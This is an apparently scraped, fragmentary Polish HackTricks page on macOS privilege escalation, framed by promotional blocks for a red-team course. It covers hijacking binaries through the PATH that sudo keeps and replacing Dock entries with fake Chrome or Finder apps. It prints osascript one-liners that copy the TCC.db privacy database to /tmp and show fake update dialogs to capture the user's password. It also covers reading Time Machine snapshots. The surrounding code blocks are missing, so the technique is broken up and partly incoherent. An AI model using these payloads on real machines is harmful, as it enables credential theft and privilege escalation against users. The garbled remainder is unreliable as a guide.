<summary><strong>Dowiedz się, jak hakować AWS od zera do bohatera z</strong><ahref="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLAN SUBSKRYPCJI**](https://github.com/sponsors/carlospolop)!
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
Należy zauważyć, że **większość sztuczek dotyczących eskalacji uprawnień w systemach Linux/Unix dotyczy również maszyn z systemem MacOS**. Więc zobacz:
Oryginalną technikę [przechwycenia sudo znajdziesz w poście o eskalacji uprawnień w systemie Linux](../../linux-hardening/privilege-escalation/#sudo-hijacking).
Jednakże, macOS **zachowuje****`PATH`** użytkownika, gdy wykonuje polecenie **`sudo`**. Oznacza to, że innym sposobem na przeprowadzenie ataku jest **przechwycenie innych binarnych plików**, które ofiara uruchamia podczas wykonywania **sudo:**
Warto zauważyć, że użytkownik korzystający z terminala prawdopodobnie ma zainstalowany **Homebrew**. Dlatego możliwe jest przejęcie binarnych plików w **`/opt/homebrew/bin`**.
* Sprawdź w Docku, czy istnieje Chrome, a w takim przypadku **usuń** ten wpis i **dodaj****fałszywy****wpis Chrome na tej samej pozycji** w tablicy Docka. 
"osascript -e 'tell application \"Finder\"' -e 'set homeFolder to path to home folder as string' -e 'set sourceFile to POSIX file \"/Library/Application Support/com.apple.TCC/TCC.db\" as alias' -e 'set targetFolder to POSIX file \"/tmp\" as alias' -e 'duplicate file sourceFile to targetFolder with replacing' -e 'end tell'; "
"PASSWORD=\$(osascript -e 'Tell application \"Finder\"' -e 'Activate' -e 'set userPassword to text returned of (display dialog \"Enter your password to update Google Chrome:\" default answer \"\" with hidden answer buttons {\"OK\"} default button 1 with icon file \"Applications:Google Chrome.app:Contents:Resources:app.icns\")' -e 'end tell' -e 'return userPassword'); "
* Nie możesz usunąć Finder z Docka, więc jeśli chcesz dodać fałszywy Finder, możesz umieścić go obok prawdziwego. Aby to zrobić, musisz dodać wpis fałszywego Findera na początku tablicy Docka.
* Inną opcją jest nie umieszczanie go w Docku i po prostu otwarcie go. "Finder proszący o kontrolę Findera" nie jest aż tak dziwne.
* Inną opcją jest **przywilejowanie się do roota bez pytania** o hasło za pomocą okropnego okienka. Możesz sprawić, że Finder naprawdę poprosi o hasło do wykonania uprzywilejowanej akcji:
* Poproś Findera o skopiowanie nowego pliku **`sudo`** do **`/etc/pam.d`** (monit o podanie hasła wskaże, że "Finder chce skopiować sudo")
* Poproś Findera o skopiowanie nowego **Pluginu Autoryzacji** (Możesz kontrolować nazwę pliku, więc monit o podanie hasła wskaże, że "Finder chce skopiować Finder.bundle")
"osascript -e 'tell application \"Finder\"' -e 'set homeFolder to path to home folder as string' -e 'set sourceFile to POSIX file \"/Library/Application Support/com.apple.TCC/TCC.db\" as alias' -e 'set targetFolder to POSIX file \"/tmp\" as alias' -e 'duplicate file sourceFile to targetFolder with replacing' -e 'end tell'; "
"PASSWORD=\$(osascript -e 'Tell application \"Finder\"' -e 'Activate' -e 'set userPassword to text returned of (display dialog \"Finder needs to update some components. Enter your password:\" default answer \"\" with hidden answer buttons {\"OK\"} default button 1 with icon file \"System:Library:CoreServices:Finder.app:Contents:Resources:Finder.icns\")' -e 'end tell' -e 'return userPassword'); "
**Dowolny użytkownik** (nawet nieuprzywilejowany) może utworzyć i zamontować migawkę Time Machine i **uzyskać dostęp do WSZYSTKICH plików** tej migawki.\
Jedynym wymaganym uprawnieniem jest, aby używana aplikacja (np. `Terminal`) miała **pełny dostęp do dysku** (FDA) (`kTCCServiceSystemPolicyAllfiles`), który musi zostać przyznany przez administratora.
<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong><ahref="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.